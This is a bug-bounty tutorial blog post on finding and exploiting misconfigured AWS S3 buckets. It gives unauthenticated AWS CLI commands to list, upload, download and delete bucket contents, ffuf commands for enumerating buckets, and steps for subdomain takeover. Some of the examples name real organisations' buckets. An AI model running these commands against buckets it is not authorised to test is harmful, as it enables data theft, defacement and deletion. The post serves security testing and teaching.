Posts S3 Bucket
Post
Cancel

S3 Bucket

Posted Feb 26 2022-02-26T00:00:00+02:00 by Yasser Elsnbay

Simple Storage Service (S3)

Content
📚 What is S3 Bucket
🤔 Why S3 Misconfiguration Happen ?
💥 Exploitation
⚔ Impact
🔎 How To Find
🛠 Tools
⚙ Remediation
📕 Referance

📚 What is S3 Bucket

What is AWS ?

AWS stands for Amazon Web Services which is a secure cloud services platform, offering compute power, database storage, content delivery and other functionalities.

What is Amazon S3 ?

Amazon S3 (Simple Storage Service) is one of the popular and widely used storage services. Many companies are using S3 buckets to store their assets such as user profile pictures, static resources, and anything as per their business logic and needs.

Files can be served either privately (via signed URLs) or publicly via an appropriately configured ACL (Access Control List) or ACP (Access Control Policy).

Like:

1
2

http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/

🤔 Why S3 Misconfiguration Happen ?

S3 Attacks

We will go through the specifics of each level and identify the dangerous cases where weak ACLs can create vulnerable configurations impacting the owner of the S3-bucket and/or through third party assets used by a lot of companies.

However, if the buckets are not configured properly, or are unclaimed, an attacker can probably perform some mischievous actions such as

  1. S3 Bucket Takeover
  2. S3 Content Takeover

💥 Exploitation

Requirements

To test for the access controls of the S3 Bucket, the best way is to use, AWS CLI and default commands.

  1. Install AWS CLI
    1

    pip install awscli
  2. check whether it is perfectly installed or not.
    1

    aws --version

  3. then you can make aws account and Provide AWS ACCESS Key & Secret to configure AWS CLI. You can watch this **video** Steps

  4. Add nd Provide AWS ACCESS Key & Secret to configure AWS CLI
    1

    aws configure

Basic tests

  1. Checking for S3 Open Buckets & Finding bucket name
  2. Using AWS CLI to Check S3 Bucket Access Controls
  3. Increasing Impact by looking at all C.R.U.D (Create, Read, Update & Delete) actions.

Listing files

1
2

aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2

Move a file into the bucket

1
2
3
4
5
6
7
8

aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers

aws s3 mv test.txt s3://hackerone.marketing
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."

aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"

Download every things

1

aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

Delete Files

1

aws s3 rm s3://[bucketname]/test-file.svg --no-sign-request

Subdomain takeover - S3 bucket

S3 buckets are spawned out of storage requirement and are bound to a particular domain. Sometimes these buckets are not deleted after they have served their purpose which may escalate to a complete take over of a subdomain of the host. Consider the following example:

An S3 bucket may be created and its URL (http://storage.example.com.s3-website.ap-south-1.amazonaws.com) may be bound to a subdomain(Eg: “https://storage.example.net”.) belonging to the organization to obfuscate the AWS S3 URL. This is done by adding an alternate domain name(CNAMEs).

Later when this bucket is deleted from AWS S3, but the CNAMEs record in the Route53 is not removed, an attacker may create an AWS S3 bucket with the same name and the malicious contents of this bucket will be served on the victim’s domain(eg: storage.example.net), Hence taking over the subdomain.

Identifying this Vulnerability The first step in identifying this vulnerability is looking for an error page which has the message “404 Not Found” and has the message “NosuchBucket”.

Or from EdOverflow

AWS/S3VulnerableThe specified bucket does not exist

⚔ Impact

Possible vulnerabilities:

  1. Reflected XSS.
  2. Stored XSS / asset control. HTML-file.
  3. Denial of server.
  4. Information disclosure. If we can list objects we might find sensitive information.
  5. RCE. If the bucket contains modifiable executables this can result in Remote Code Execution (RCE) depending on where the executables are being used and if/by whom they are being downloaded.

🔎 How To Find

FFUF

ffuf -u http://FUZZ.s3.amazonaws.com -w  subdomains.txt | anew -a s3_buckets_subs.txt
ffuf -u http://s3.amazonaws.com/FUZZ -w  subdomains.txt | anew -a s3_buckets_dirs.txt

You can put this in your recon after get subdomains steps or just using one of Tools Below

Follow Twitter #BugBountyTips hashtag to get new tricks to find s3 bucket during your Recon or by using Automated Tools like:

Lazy S3,S3Scanner,S3 Bucket Finder & Mass3

🛠 Tools

Lazy S3: A Ruby script to bruteforce for AWS s3 buckets using different permutations. Mass3:Quickly enumerate through a pre-compiled list of AWS S3 buckets using DNS instead of HTTP with a list of DNS resolvers and multi-threading. S3 Bucket Finder: PHP tool to brute force Amazon S3 bucket S3Scanner: A tool to find open S3 buckets and dump their contents

⚙ Remediation

Make sure all the Amazon S3 buckets you are using are marked as private.

📕 Referance

PayloadsAllTheThings janijay007 detectify pravinponnusamy Harsh Bothra EdOverflow

Web-Vulnerabilities, S3
Vulnerability S3
This post is licensed under CC BY 4.0 by the author.

Contents

Open Redirect

HTTP Parameter Pollution HPP